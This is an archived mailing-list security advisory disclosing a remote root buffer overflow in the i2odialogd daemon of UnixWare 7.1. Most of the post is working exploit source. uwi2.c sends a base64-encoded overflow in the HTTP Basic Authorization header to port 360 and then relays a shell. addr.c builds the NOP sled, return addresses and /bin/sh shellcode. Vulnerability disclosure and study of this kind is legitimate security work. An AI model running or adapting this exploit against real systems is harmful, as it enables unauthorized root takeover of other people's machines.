Greetings, OVERVIEW Anyone can gain remote root access to a UnixWare 7.1 system by exploiting a vulnerability in the i2odialogd daemon. This daemon is installed and running by default. BACKGROUND I've only tested UnixWare 7.1. OpenServer doesn't feature this particular daemon, so it is not vulnerable. I tried to make my UW7 install as generic as possible, so I would imagine that this service is enabled by default after install. DETAILS The i2odialog daemon is an HTTP frontend to control the i2o subsystem. Since a user who has control over this subsystem could do all sorts of nasty things, SCO has wisely chosen to authenticate a potential user against the local encrypted root password. It does this via the standard GET / HTTP/1.0 Authorization: Basic username:password\r\n\r\n Unfortunatly, we have a classic buffer overflow in the username:password field. When fed a string of 88+ characters, we can segfault the daemon and control EIP. The only complication to this is the fact that according to the relevant RFC's, the username:password pair must be base64(MIME) encoded. Therefore we are forced to MIME encode our entire exploit string. In addition to this, the buffer we have to work with is very small, so we'll be changing the order of NOP+SHELLCODE+ADDR to ADDR+NOP+SHELLCODE in order to give ourselves a wider range of usable addresses. EXPLOIT Some notes about the exploit: I couldn't manage to dig up any mimencode() functions that would be easily usable in this program, so you're going to have to hard-code your exploit string. This means that if you want to change the return address from the default I have below (and remember, I've only tested MY system), you're going to have to MIME encode 92 bytes of addresses (or 88 bytes of garbage and your 4-byte address), then some NOP's, then the shellcode, then a colon, any character and a NULL. ADDR+NOP+SHELLCODE+:+A+0. You must then put this MIME-encoded string (don't forget that you must NOT append a newline to the exploit string) into the program where I've marked. Under UnixWare, you can use mimencode(1) to convert stdout from your program into MIME-encoded text. I've included a program below which will produce the particular modified exploit string you'll pipe through the mime encoder. ---uwi2.c--- /* uwi2.c * * i2o remote root exploit for UnixWare 7.1 * compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl * ./uwi2 <hostname> * The hard-coded RET address is 0x8047d4c * * To either replace the shellcode or change the offset you must * first craft a program which outputs, in this order: * - 92 bytes of your RET address (EIP starts at 89) * - NOPs, as many as you would like * - your shellcode * - the character ":" * - any character, maybe "A", as I've done below * - NULL * When printf()'ing this string, do NOT append a \newline! * You then pipe the output of this program to a MIME encoder (mimencode * on UnixWare). You then take the output of this program and paste it * where I've marked below. * * Brock Tellier btellierat_private * */ #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/errno.h> #include <netdb.h> #define BUFLEN 10000 /* since we're overflowing an Authenticate: Basic username */ /* our exploit code must be base64(MIME) encoded */ char *mimecode= /**** CHANGE THIS PART OF THE EXPLOIT STRING ****/ "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ" "kJCQkJCQTH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECJCQkJCQkJCQ" "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ" "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ" "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ" "kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xteMduJXgeJXgyIXhExwLA7jX4HiflT" "UVZW6xDo4P///y9iaW4vc2iqqqqqmqqqqqoHqpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ" "kJCQkJCQkJCQkJCQkJCQkJCQkDpB"; /************************************************/ char *auth= "GET / HTTP/1.0\r\n" "Host: localhost:360\r\n" "Accept: text/html\r\n" "Accept-Encoding: gzip, compress\r\n" "Accept-Language: en\r\n" "Negotiate: trans\r\n" "User-Agent: xnec\r\n" "Authorization: Basic"; char buf[BUFLEN]; char sockbuf[BUFLEN]; char c; int offset=0; int i, ascii,num; int i2oport = 360; int sock; int addr = 0x80474b4; struct sockaddr_in sock_a; struct hostent *host; void main (int argc, char *argv[]) { if(argc < 2) { fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]); exit(0); } if(argc == 3) offset=atoi(argv[2]); sprintf(buf, "%s %s \r\n\r\n", auth, mimecode); buf[BUFLEN - 1] = 0; fprintf(stderr, "i2odialogd remote exploit for UnixWare 7.1\n"); fprintf(stderr, "Brock Tellier btellierat_private\n"); if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("create socket"); exit(-1); } sock_a.sin_family=AF_INET; sock_a.sin_port=htons(i2oport); memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { perror("create connect"); exit(-1); } fflush(stdout); // write exploit write(sock,buf,strlen(buf)); //begin read while(1) { fd_set input; FD_SET(0,&input); FD_SET(sock,&input); select(sock+1,&input,NULL,NULL,NULL); if(FD_ISSET(sock,&input)) { num=read(sock,sockbuf,BUFLEN); write(1,sockbuf,num); } if(FD_ISSET(0,&input)) write(sock,sockbuf,read(0,sockbuf,BUFLEN)); } } ------ --- addr.c --- /* * addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2dialogd * simply MIME encode the output of this program and put into the * appropriate place in uwi2.c * * Usage: cc -o addr addr.c; ./addr <offset> <size> * * Brock Tellier btellierat_private */ #include <stdio.h> #define NOP 0x90 char scoshell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; void main(int argc, char *argv[]) { long addr; char buf[2000]; int i; int offset; int size = 400; if (argc > 1) offset = atoi(argv[1]); if (argc > 2) size = atoi(argv[2]); addr=0x8046000 + offset; memset(buf, NOP, size); for(i=60;i<100;i+=4)*(int *)&buf[i]=addr; for(i = 0; i < strlen(scoshell); i++) buf[i+300] = scoshell[i]; buf[size - 3] = ':'; buf[size - 2] = 'A'; buf[size - 1] = 0; fprintf(stderr, "using addr 0x%x with offset %d \n", addr, offset); fprintf(stderr, "mime-encode the stdoutput!\n"); printf(buf); } ------ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellierat_private ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:22:24 PDT